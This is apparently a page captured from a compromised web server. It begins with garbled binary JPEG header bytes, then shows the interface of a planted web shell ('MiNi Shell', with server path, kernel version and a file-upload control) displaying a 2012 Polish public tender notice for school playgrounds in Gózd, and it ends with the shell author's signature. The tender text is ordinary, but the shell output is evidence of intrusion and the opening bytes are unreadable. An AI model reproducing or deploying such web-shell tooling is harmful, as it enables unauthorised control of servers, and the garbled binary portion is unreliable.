JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/254620-N-2012.html

<p class="kh_header"><b>Gózd: Utworzenie placów zabaw w ramach rządowego programu  Radosna Szkoła przy  PSP im. H. Sienkiewicza w Klwatce, PSP im. Jana Pawła II w Kuczkach Kolonii i PSP im. T. Kościuszki w Kłonówku</b><br>
<b>Numer ogłoszenia: 254620 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno Administracyjny Szkół , ul. Radomska 7, 26-634 Gózd, woj. mazowieckie, tel. 048 3202357, faks 048 3202357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gozd.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie placów zabaw w ramach rządowego programu  Radosna Szkoła przy  PSP im. H. Sienkiewicza w Klwatce, PSP im. Jana Pawła II w Kuczkach Kolonii i PSP im. T. Kościuszki w Kłonówku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia  obejmuje wykonanie w systemie zaprojektuj i wybuduj 
(w oparciu o warunki niniejszej Specyfikacji Istotnych Warunków Zamówienia, oraz
załączony do niej program funkcjonalno - użytkowy)  trzech zadań pn. :
Zadanie I -  Utworzenie placu zabaw w ramach Rządowego Programu Radosna 
Szkoła przy PSP im. H. Sienkiewicza w Klwatce.
Zadanie II -  Utworzenie placu zabaw w ramach Rządowego Programu Radosna 
Szkoła przy PSP im. Jana Pawła II w Kuczkach Kolonii.
Zadanie III -  Utworzenie placu zabaw w ramach Rządowego Programu  Radosna 
Szkoła przy PSP im. T. Kościuszki w Kłonówku.
1.1.Zakres prac składający się na przedmiot zamówienia do wykonania w ramach 
każdego zadania obejmuje w szczególności :
1.1.1) Opracowanie oddzielnie dla każdego zadania projektu budowlanego,
wykonawczego, Specyfikacji Technicznej Wykonania i Odbioru Robót, kosztorysu 
uproszczonego.
1.1.2) Roboty budowlane:
a) roboty ziemne,
b) dostawę i montaż nowego sprzętu rekreacyjnego,
c) wykonanie podbudowy pod nawierzchnię syntetyczną placu zabaw,
d) wykonanie nawierzchni syntetycznej,
e) wykonanie zieleni towarzyszącej,
f) inne roboty towarzyszące indywidualne dla każdego zadania, rozebranie chodnika
z kostki i ponowne ułożenie - Publiczna Szkoła Podstawowa w Kuczkach Kolonii.
g) wykonanie i montaż tablic informacyjnych ( dot. każdego zadania) o utworzeniu  
placów zabaw w ramach Rządowego Programu  Radosna Szkoła.
1.2. W/w zakres robót należy wykonać zgodnie z warunkami Specyfikacji Istotnych 
Warunków Zamówienia (SIWZ), w szczególności zgodnie ze stanowiącym załącznikiem do niej programem funkcjonalno-użytkowym dot. poszczególnych zadań. 
1.3. Jeżeli w SIWZ lub programie funkcjonalno-użytkowym,  przy opisie przedmiotu 
zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych o parametrach nie gorszych niż wskazane.
1.4. Zgodnie z art.30 ust.5 ustawy p.z.p. Wykonawca, który powołuje się na rozwiązanie równoważne, jest zobowiązany wykazać, że oferowane przez niego materiały ( wyroby), urządzenia spełniają wymagania określone przez Zamawiającego.
1.5.W takim przypadku Wykonawca musi załączyć do oferty foldery, dane techniczne i aprobaty techniczne tych materiałów ( wyrobów), urządzeń aby Zamawiający mógł sprawdzić czy odpowiadają one wymaganiom postawionym w SIWZ i programach funkcjonalno- użytkowych.
1.6.Wykonawca obowiązany jest:
a) w ciągu maks. 14 dni od dnia zawarcia umowy wykonać i przekazać 
Zamawiającemu do zaopiniowania koncepcję architektoniczną, dla każdego
zadania oddzielnie. Koncepcja musi zawierać część opisową, plan 
zagospodarowania placu zabaw ( w tym rozmieszczenie urządzeń ze strefami 
bezpieczeństwa, przekrój z opisem warstw), wykaz urządzeń przeznaczonych 
do montażu, oraz ich kolorowe ilustracje, np.  zdjęcia, rysunki itp. ( wszystkie 
urządzenia muszą spełniać warunki określone w programie funkcjonalno -
użytkowym ). Zamawiający w ciągu 3 dni zaopiniuje w/w koncepcję,
b) przekazać kompletną dokumentację projektową w terminie maks. 30 dni od dnia
zawarcia umowy ( w/w dokumentacja musi uwzględniać ewentualne uwagi 
zgłoszone przez Zamawiającego w dokumencie opiniującym koncepcję 
architektoniczną),
c) Zamawiający przekaże wybranemu Wykonawcy mapy zasadnicze w skali 1:500,oraz mapy sytuacyjne w skali 1 : 5000,
d) Wykonawca  ma obowiązek zgłoszenia  - w imieniu Zamawiającego - rozpoczęcia
robót do Starostwa Powiatowego w Radomiu ul. Domagalskiego7 ( Wykonawca
uzyska odpowiednie upoważnienie do dokonania w/w zgłoszenia).  
1.7. Prace towarzyszące i roboty tymczasowe konieczne do uwzględnienia, np.:
a) organizacja i zabezpieczenie placu budowy;
b) pełna obsługa geodezyjna w trakcie realizacji zadania wraz z 4 egz. inwentaryzacji powykonawczej zadania;
c) uporządkowanie terenu objętego placem budowy i przywrócenie do stanu pierwotnego, oraz wszelkie inne prace nie objęte w SIWZ i w programach funkcjonalno-użytkowych, a konieczne do wykonania ze względu na sztukę budowlaną i wymogi programu Radosna Szkoła,
1.8. Wykonawca udzieli Zamawiającemu gwarancji oraz rękojmi na wykonane 
 roboty budowlane, sztuczną nawierzchnię bezpieczną, oraz urządzenia placu zabaw
i urządzenia małej architektury na okres trzech ( 3 ) lat licząc od daty odbioru 
końcowego. 
1.9.Zamawiający dopuszcza możliwość dokonania wizji lokalnej przed terminem 
składania ofert.  Wykonawca w trakcie wizji lokalnej winien zapoznać się z miejscem
realizacji zamówienia celem uwzględnienia w cenie oferty wszelkich innych prac
nie objętych niniejszą SIWZ a koniecznych do wykonania ze względu na sztukę 
budowlaną  oraz do poniesienia dla prawidłowego zrealizowania przedmiotu
zamówienia. Wizja lokalna zostanie dokonana na koszt własny wykonawcy.
1.10. Zamawiający zastrzega sobie prawo ograniczenia lub zwiększenia w/w zakresu
Zamówienia.
2. WYMAGANIA PRZEDMIOTOWE.
Wykonawca zobowiązany jest do złożenia wraz z ofertą, opracowanego na podstawie SIWZ,  programów  funkcjonalno użytkowych   harmonogramu rzeczowo
finansowego  dot. poszczególnych zadań, korzystając ze wzoru stanowiącego załącznik nr 7 do SIWZ. Suma wartości podanych w harmonogramach musi być zgodna z ceną ofertową. Jeżeli Wykonawca przewidział w cenie ofertowej zakres robót wynikający z własnej kalkulacji robót tymczasowych i prac towarzyszących nie objętych dokumentacją przetargową obowiązany jest również uwzględnić ten zakres w odpowiedniej pozycji harmonogramu.
Wartość zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art.11 ust.8 ustawy Prawo zamówień publicznych  ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 71.32.00.00-7, 45.23.32.50-6, 37.53.52.00-9, 45.22.38.00-4, 77.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikaty bezpieczeństwa dla urządzeń zabawowych wystawione w oparciu
o aktualnie obowiązujące wersje norm bezpieczeństwa PN-EN 1176 części1-11,
PN-EN 1177 (2008,2009).
Deklaracje zgodności dla urządzeń małej architektury wystawione w oparciu o aktualnie obowiązujące wersje  norm bezpieczeństwa PN-EN 1176 części1-11,
PN-EN 1177 (2008,2009).
Karty techniczne zawierające zdjęcia/rysunki oraz szczegółowe opisy urządzeń.
Wizualizacja placu zabaw z umiejscowieniem urządzeń, zaznaczeniem stref 
bezpieczeństwa, rzutami bocznymi z zaznaczonymi wysokościami, kształtem
i wymiarami placu zabaw.  
Koncepcję zagospodarowania terenu w postaci wizualizacji placu zabaw 
z rozmieszczonymi urządzeniami, rzuty z góry proponowanych urządzeń zabawowych z naniesionymi strefami bezpieczeństwa, rzuty boczne z zaznaczonymi maksymalnymi wysokościami upadku.  
Certyfikaty na bezpieczną nawierzchnię sztuczną.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument  określający zasady reprezentacji oraz osoby uprawnione do reprezentacji
wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo
określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.
Harmonogram rzeczowo - finansowy.
Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gozd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno Administracyjny Szkół w Goździe ul. Radomska 7, 26 - 634 Gózd pok. 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2012 godzina 09:50, miejsce: Zespół Ekonomiczno Administracyjny Szkół w Goździe ul. Radomska 7, 26 - 634 Gózd pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com